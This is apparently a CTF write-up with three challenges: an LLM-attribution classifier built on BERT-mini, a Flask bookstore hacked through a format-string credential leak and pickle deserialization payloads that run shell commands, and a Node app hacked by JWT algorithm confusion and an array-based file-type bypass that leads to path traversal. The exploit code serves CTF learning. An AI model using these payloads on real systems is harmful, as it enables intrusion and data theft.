虚拟身份辨识战

题目详情

你需要根据给定数据集,分析出新收集到的会话数据是来自于哪些大语言模型。

文件信息

  • bert-mini-model: 一个包含了 bert-mini 模型的文件夹,该模型参数量约为 11M。
  • dataset.json:从四个大语言模型(LLM)进行交互得来的数据集。其中 label 字段为该会话与哪个 LLM 进行交互,范围 0-3。
    示例数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[
{
"conversation": [
{
"role": "user",
"content": "1. Take the input list of unsorted integers from the user."
},
{
"role": "assistant",
"content": "To take an input list of unsorted integers from the user, you can follow these steps in a Python script:\n\n1. Prompt the user to enter a list of numbers separated by spaces or commas.\n2. Read the input from the user.\n3. Split the input string into individual components.\n4. Convert these components into integers.\n5. Handle any potential errors that may occur during input and conversion (e.g., non-numeric input).\n\nHere's a sample Python code to demonstrate this process:\n\n```python\n# Prompt the user to enter a list of integers\nuser_input = input(\"Enter a list of integers, separated by spaces or commas: \")\n\n# Convert the input string into a list of strings split by spaces or commas\n# Also strip whitespace in case of input separated by both spaces and commas\nstr_numbers = user_input.replace(',', ' ').split()\n\ntry:\n # Convert the list of strings into a list of integers\n int_numbers = [int(num) for num in str_numbers]\n print(\"You entered the following list of integers:\", int_numbers)\nexcept ValueError:\n print(\"Please enter valid integers only.\")\n\n```\n\nThis code snippet will prompt the user to enter a list of integers either separated by spaces or commas, and then it will output the list of integers. It includes a basic error handling for non-integer inputs by catching a `ValueError`. Adjust the input prompt and error handling to fit your specific use case as necessary."
}
],
"label": 0
},
...
]
  • flag.json: 新收集得来的 LLM 会话数据。
    示例数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[
{
"conversation": [
{
"role": "user",
"content": "Continuation: What could be the probable outcome if someone fails to revise their model after the second experiment?\nGenerate according to: After an initial observations, the students believe they know how the strings are connected inside the Mystery Tube. After you perform a second \"experiment\", their observations confuse them. They have to revise their model. Finally, your third \"experiment\" baffles them. Just how are the strings connected?\nAfter performing this demonstration, students BEG me to tell them the secret for months... a few will try for more than a year. Some have tried to steal the Mystery Tube... one actually succeeded. Some have built their own at home just so they can figure out how it works.\nThis is a fun demonstration and students will learn a lot about scientific investigation."
},
{
"role": "assistant",
"content": "If someone fails to revise their model after the second experiment in the Mystery Tube demonstration, several probable outcomes could occur:\n\n1. Misconceptions:\n- They might hold onto incorrect assumptions about how the strings are connected\n- This could lead to persistent misunderstandings about the actual mechanism\n\n2. Limited Learning:\n- They would miss the crucial lesson about how scientific models need to be flexible and adaptable\n- The importance of revising hypotheses based on new evidence would be lost\n\n3. Frustration:\n- They might become increasingly frustrated when their original model fails to explain new observations\n- This could lead to disengagement from the learning process\n\n4. Missed Scientific Process:\n- They would fail to experience the authentic scientific process of model revision\n- The valuable lesson about how scientists must adjust their theories based on new data would be lost\n\n5. Incomplete Understanding:\n- Their understanding of the phenomenon would remain incomplete or incorrect\n- This could affect their ability to grasp similar concepts in future scientific investigations\n\nThe key learning opportunity in this demonstration lies in the process of revising one's thinking based on new evidence, so failing to do so would significantly diminish the educational value of the experience."
}
]
},
...
]
  • flag_process.py: LLM 预测标签解码 flag 的辅助代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
from reedsolo import RSCodec
import random
import math
import string

FLAG_TOTAL_LENGTH = 32
FLAG_PART_LENGTH = 8
assert FLAG_TOTAL_LENGTH % FLAG_PART_LENGTH == 0
NSYM = math.ceil(FLAG_TOTAL_LENGTH * 0.4 * 2) # 计算 Reed-Solomon 纠错码长度
PERCENT_TO_CORRUPT = 0.1 # 损坏比例 (10%)

def encode_flag(message):
"""
编码器函数,根据传入的 flag 设置冗余数据。
"""
rs = RSCodec(NSYM) # 创建 Reed-Solomon 编码器
encoded_message = rs.encode(message) # 添加纠错码
return encoded_message

def decode_flag(encoded_message):
"""
解码器函数,尝试解码和恢复原始消息。
使用固定的冗余设置 NSYM 字节。
"""
rs = RSCodec(NSYM) # 创建 Reed-Solomon 解码器
try:
decoded_message, _, _ = rs.decode(encoded_message) # 尝试解码和纠错
return decoded_message
except Exception as e:
print("Failed to decode message:", e)
return None

# 将 0-3 的数字数组转换为 bytes
def encode_to_bytes(numbers):
# 将 0-3 的数字数组转换为字节序列,每个数字用 2 位表示,4 个数字组成 1 字节
bit_string = ''
for num in numbers:
cur_bin = format(num, '02b') # 将 0-3 的数字转为 2 位二进制
assert len(cur_bin) == 2
bit_string += cur_bin
assert len(bit_string) % 8 == 0
byte_array = int(bit_string, 2).to_bytes(len(bit_string) // 8, byteorder='big')
return byte_array


# 从 bytes 解码为 0-3 的数字数组
def decode_from_bytes(byte_array):
# 将字节序列转换回 0-3 的数字数组,每个字节拆分为 4 个数字
bit_string = ''
for i in range(len(byte_array)):
assert 0 <= byte_array[i] <= 255
byte_bin = bin(byte_array[i])[2:].zfill(8) # 字节转 8 位二进制
assert len(byte_bin) == 8
bit_string += byte_bin

# 每 2 位切一段,转换回 0-3 的数字
numbers = []
for i in range(0, len(bit_string), 2):
num = int(bit_string[i:i+2], 2) # 每两位解析为一个数字
numbers.append(num)

return numbers

def generate_random_flag():
"""
生成一个格式为 abcd-abcd-abcd-abcd 的 UUID,并使用 flag{} 包裹。
每个部分是 4 个随机小写字母。
"""
parts = ["".join(random.choices(string.ascii_lowercase, k=FLAG_PART_LENGTH)) for _ in range(FLAG_TOTAL_LENGTH // FLAG_PART_LENGTH)]
flag = f"flag{{{'-'.join(parts)}}}"
return flag.encode()

if __name__ == "__main__":
for idx in range(0x200):
print(f"====== {idx} ======")
# 生成一个 16 字节的 flag
flag = generate_random_flag()
print(f"Original message ({len(flag)}):", flag)

# 编码:根据 flag 设置冗余数据
encoded_message = encode_flag(flag) # 添加纠错码
print(f"Encoded message ({len(encoded_message)}):", encoded_message)

# 编码为 bytes
labels = decode_from_bytes(encoded_message) # 转为数字数组
print(f"Decoded labels ({len(labels)})")

# 模拟 20% 比特损坏
num_labels = len(labels)
num_labels_to_corrupt = math.ceil(num_labels * PERCENT_TO_CORRUPT)

# 创建随机损坏区间
num_intervals = random.randint(1, 5) # 随机选择 1 到 5 个区间
intervals = []
remaining_corruption = num_labels_to_corrupt
for _ in range(num_intervals):
if remaining_corruption == 0:
break
start_index = random.randint(0, num_labels - 1)
max_length = min(remaining_corruption, num_labels - start_index)
interval_length = random.randint(1, max_length)
end_index = start_index + interval_length
intervals.append((start_index, end_index))
remaining_corruption -= interval_length

# 应用损坏
for start_index, end_index in intervals:
for i in range(start_index, end_index):
labels[i] = random.randint(0, 3) # 随机替换为 0-3

# 解码:恢复原始消息
noisy_message = encode_to_bytes(labels) # 转回字节序列
print(f"Noisy message ({len(noisy_message)}):", noisy_message)
decoded_flag = decode_flag(noisy_message) # 解码并纠错
assert decoded_flag
print("Decoded (recovered) message:", decoded_flag)
assert flag == decoded_flag

print("success")

更多信息

你需要对 flag.json 中的每一个会话预测一个标签值,代表该会话来自于哪一个 LLM。标签范围与 dataset.json 中相同,为 0-3。
在预测出 N 个标签之后,请参照 flag_process.py 里的代码来将预测出来的多个标签解码为真正的 flag。

flag 的编码过程使用了冗余自纠正编码,因此预测准确率大于 95% 左右即可成功解密,准确率越高解密成功率越高。

运行环境

RTX 3090 * 1卡
PyTorch 2.5.1
Python 3.12(ubuntu22.04)
CUDA 12.4

pip install transformers
pip install reedsolo

训练模型

train.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
import json
import torch
from torch.utils.data import Dataset, DataLoader
from transformers import BertTokenizer, BertForSequenceClassification
from tqdm import tqdm
from torch.optim import AdamW

# 加载数据集
with open('dataset.json', 'r',encoding="UTF-8") as f:
data = json.load(f)

# 准备文本和标签
contents = []
labels = []
for i in range(len(data)):
contents.append(data[i]['conversation'][1]['content'])
labels.append(data[i]['label'])

# 加载预训练的BERT分词器
tokenizer = BertTokenizer.from_pretrained('bert-mini-model')
# 加载预训练的BERT序列分类模型,设置输出类别数为4
model = BertForSequenceClassification.from_pretrained('bert-mini-model', num_labels=4)

# 使用分词器处理所有文本:
# truncation=True - 超过最大长度的文本将被截断
# padding='max_length' - 填充到最大长度
# max_length=512 - 设置最大序列长度(BERT的标准长度)
# return_tensors='pt' - 返回PyTorch张量
encodings = tokenizer(contents, truncation=True, padding='max_length', max_length=512, return_tensors='pt')
# 获取编码后的输入ID张量
input_ids = encodings['input_ids']
# 获取注意力掩码张量(标识实际内容与填充部分)
attention_mask = encodings['attention_mask']
# 将标签列表转换为PyTorch张量
labels = torch.tensor(labels)

# 创建数据集和数据加载器
dataset = torch.utils.data.TensorDataset(input_ids, attention_mask, labels)
dataloaded = DataLoader(dataset, batch_size=8, shuffle=True)

# 设置训练参数和设备
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f"Using device: {device}")
model.to(device)

# 初始化AdamW优化器,设置学习率为0.00002
optimizer = AdamW(model.parameters(), lr=2e-5)

for epoch in range(3):
model.train()
total_loss = 0
progress_bar = tqdm(dataloaded, desc=f'Epoch {epoch + 1}') # 创建进度条

for batch in progress_bar:
input_ids, attention_mask, labels = [b.to(device) for b in batch]

optimizer.zero_grad()

# 前向传播
outputs = model(input_ids=input_ids, attention_mask=attention_mask, labels=labels)
loss = outputs[0] # 获取损失值(分类任务中第一个返回值是损失)
total_loss += loss.item() # 累加损失值

loss.backward() # 反向传播计算梯度
optimizer.step() # 更新模型参数

# 更新进度条显示当前损失
progress_bar.set_postfix({'loss': loss.item()})

# 计算并打印epoch平均损失
avg_loss = total_loss / len(dataloaded)
print(f'Epoch {epoch + 1}, Average Loss: {avg_loss:.4f}')

# 保存训练好的模型和分词器
model.save_pretrained('trained_model')
tokenizer.save_pretrained('trained_tokenizer')

预测结果

predict.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import json
import torch
from transformers import BertTokenizer, BertForSequenceClassification
from tqdm import tqdm
import math
import random
from flag_process import *

# 加载训练好的模型
model_path = 'trained_model'
tokenizer_path = 'trained_tokenizer'
tokenizer = BertTokenizer.from_pretrained(tokenizer_path)
model = BertForSequenceClassification.from_pretrained(model_path)

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f"Using device: {device}")
model.to(device)
model.eval()

# 处理输入数据
with open('flag.json', 'r', encoding = 'utf-8') as f:
contents = json.load(f)
predict_contents = []
for content in contents:
predict_contents.append(content['conversation'][1]['content'])
print(predict_contents)

# 使用 BERT 模型预测标签,输出 0-3 的数字标签(对应原始 flag 的编码)
predictions = []
for text in predict_contents:
encoding = tokenizer(text, max_length=512, padding='max_length', truncation=True, return_tensors='pt')
input_ids = encoding['input_ids'].to(device)
attention_mask = encoding['attention_mask'].to(device)
with torch.no_grad():
outputs = model(input_ids=input_ids, attention_mask=attention_mask)

logits = outputs.logits
pred = torch.argmax(logits, dim=1).item()
predictions.append(pred)

labels = predictions
# 后面部分参考flag_process.py
num_labels = len(labels)
num_labels_to_corrupt = math.ceil(num_labels * PERCENT_TO_CORRUPT)
num_intervals = random.randint(1, 5)
intervals = []
remaining_corruption = num_labels_to_corrupt
for _ in range(num_intervals):
if remaining_corruption == 0:
break
start_index = random.randint(0, num_labels - 1)
max_length = min(remaining_corruption, num_labels - start_index)
interval_length = random.randint(1, max_length)
end_index = start_index + interval_length
intervals.append((start_index, end_index))
remaining_corruption -= interval_length

for start_index, end_index in intervals:
for i in range(start_index, end_index):
labels[i] = random.randint(0, 3)

noisy_message = encode_to_bytes(labels)
print(f"Noisy message ({len(noisy_message)}):", noisy_message)
decoded_flag = decode_flag(noisy_message)
print("Decoded (recovered) message:", decoded_flag)

价值1000分的flag

1
flag{umtsywtc-coxcigwv-njqbbipq-tqucbeip}

bookstore

/backup 路由存在源代码泄露

app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
from flask import Flask, request, \
session, g, redirect, url_for, \
abort, render_template, flash, \
render_template_string
import os
from settings import *
import pickle
import re
import traceback

app = Flask(__name__)
app.config.update(dict(
DATABASE='',
DEBUG=True,
SECRET_KEY=os.environ.get('SECRET_KEY'),
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)

class ErrorHandler():
def __init__(self):
self.notfound = "Oops! That page doesn't exist."
self.badreqyest = "Your Rquest We Could Not Understand"

@app.errorhandler(404)
def page_not_found(error):

template = '''
<div class="center-content error">
<h1>{error.notfound} !!!</h1>
<h2>''' + request.url + '''</h2>
</div>
'''
error = ErrorHandler()
return template.format(error = error), 404

def get_books(book_name=None):
if book_name:
try:
with open('./books/' + book_name, 'rb') as f:
book = pickle.load(f)
return book
except:
return None
else:
books = []
dirs = os.listdir("./books/")
for book_name in dirs:
try:
with open('./books/' + book_name, 'rb') as f:
book = pickle.load(f)
except:
continue
books.append(book)
return books

def save_book(book_name, book_bio, book_img, book_price, book_num):
book = pickle.dumps((book_name, book_img, book_bio, book_price, book_num))
with open('./books/' + book_name, 'wb') as f:
f.write(book)

@app.route("/bookAdd",methods=['POST','GET'])
def upload():
if session.get('logged_in', None) and session.get('name', None) == 'admin':
if request.method == 'POST':
try:
book_name = request.form.get('book_name')
book_bio = request.form.get('book_bio')
book_price = int(request.form.get('book_price'))
book_num = int(request.form.get('book_num'))

f = request.files['myfile']
book_img = f.filename
save_book(book_name, book_bio, book_img, book_price, book_num)
f.save("./static/img/"+f.filename)
except Exception as e:
traceback.print_exc()
return "Something Wrong!!!"
return "Book Add Success"
else:
return render_template('tmpl/bookAdd.html')
return 'You are not login'

# 主页
@app.route('/')
@app.route('/index')
def index():
if session.get('logged_in', None):
name = session.get('name')
if name == 'admin':
return render_template('index.html')
else:
session['logged_in'] = 0
session['name'] = 'Anonymous'
msg = 'Please Login First, {} '

return render_template('index.html', msg=msg.format(session.get('name')))

@app.route('/login',methods=['POST','GET'])
def login():
if request.method == 'GET':
return render_template('login.html')
else:
username = request.form.get('username')
password = request.form.get('password')
if username == ADMIN_USER and password == ADMIN_PASSWORD:
session['logged_in'] = 1
session['name'] = 'admin'
msg = 'Please Login First, {} '
return render_template('index.html', msg=msg.format(session.get('name')))

@app.route('/logout')
def logout():
session['logged_in'] = 0
session['name'] = 'Anonymous'
msg = 'Please Login First, {} '
return render_template('index.html', msg=msg.format(session.get('name')))

@app.route('/bookDetail/<string:book_name>')
def book_detail(book_name):
book = get_books(book_name)
return render_template('tmpl/bookDetail.html', book=book)

@app.route('/backup')
def hint():
return open(__file__).read()

@app.route('/bookList')
def book_list():
books = get_books()
return render_template('tmpl/bookList.html', books=books)

if __name__ == '__main__':
app.run(host='0.0.0.0',debug=False,port=8080)

审计代码发现需要伪造admin进行图书保存从而实现pickle的反序列化

但伪造admin需要知道admin的账户密码。发现在404报错处存在格式化字符串漏洞

可以使用如下方式利用__ init __方法获取全局变量

1
{error.__init__.__globals__}

alt text

得到账户密码为

alt text

admin:nishibukenengcaichulaide12345678

登陆后就可以进行书籍添加
然后就是生成一个pickle文件 上传上传到 books 目录下 命令执行即可

exp.py

1
2
3
4
5
6
7
8
import pickle

class A():
def __reduce__(self):
return (eval, ("__import__('o'+'s').system('ls / > ./static/img/ls')",))
a = A()
with open("./test.pkl", "wb") as f:
pickle.dump(a, f)

alt text

在static下获取到flag

或者

gen-opcode.py

1
2
3
4
5
6
7
8
9
10
11
12
import pickle
import os
import base64

class genpoc(object):
def __reduce__(self):
s = """ls -al / > ./static/img/shell.out""" 要执行的命令
return os.system, (s,) reduce函数必须返回元组或字符串

e = genpoc()
poc = pickle.dumps(e)
print(base64.b64encode(poc))

运行后base64解码保存下来

alt text

用burp上传一下

alt text

最后访问../../static/shell.out在环境变量里面得到flag

alt text

Deprecated

这里的jwt写的很奇怪

alt text

decode的时候支持使用非对称RS256和对称HS256,但是签名的时候用的是非对称加密RS256

如果能拿到公钥,那么就可以任意身份伪造

参考2024网鼎杯青龙组web01,用多个hs256计算得到的结果攻击出来公钥

alt text

得到公钥,直接伪造即可

1
2
3
4
5
6
7
8
const jwt = require('jsonwebtoken');
const fs = require('fs');
const publicKey = fs.readFileSync('./b3ec3db187fa955c_65537_x509.pem', 'utf8');
data={
username: "admin", priviledge:'File-Priviledged-User'
}
data = Object.assign(data);
console.log(jwt.sign(data, publicKey, { algorithm:'HS256'}))

checkfile路由存在文件读取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
router.get('/checkfile', AuthMiddleware, async (req, res, next) => {
try{
let user = await db.getUser(req.data.username);
if (user === undefined) {
return res.send(`user ${req.data.username} doesn't exist.`);
}
if (req.data.username === 'admin' && req.data.priviledge==='File-Priviledged-User'){
let file=req.query.file;
if (!file) {
return res.send('File name not specified.');
}
if (!allowedFile(file)) {
return res.send('File type not allowed.');
}
try{
if (file.includes(' ') || file.includes('/') || file.includes('..')) {
return res.send('Invalid filename!');
}
}
catch(err){
return res.send('An error occured!');
}

if (file.length > 10) {
file = file.slice(0, 10);
}
const returned = path.resolve('./' + file);
fs.readFile(returned, (err) => {
if (err) {
return res.send('An error occured!');
}
res.sendFile(returned);
});
}
else{
return res.send('Sorry Only priviledged Admin can check the file.').status(403);
}

}catch (err){
return next(err);
}
});
const allowedFile = (file) => {
const format = file.slice(file.indexOf('.') + 1);
return format == 'log';
};

这个逻辑其实乍一眼看没问题 ,但是重点在这里

1
return format == 'log';

nodejs也有弱比较和强比较 这里就意味着形如这样也能返回true

1
console.log(['log']=="log")

那思路就很简单了,使用数组。利用js中indexOf这些都支持数组和字符串的函数即可绕过

1
var filename = ['','','','','','','','','','../../../../../flag.txt',"./",'.','log']

alt text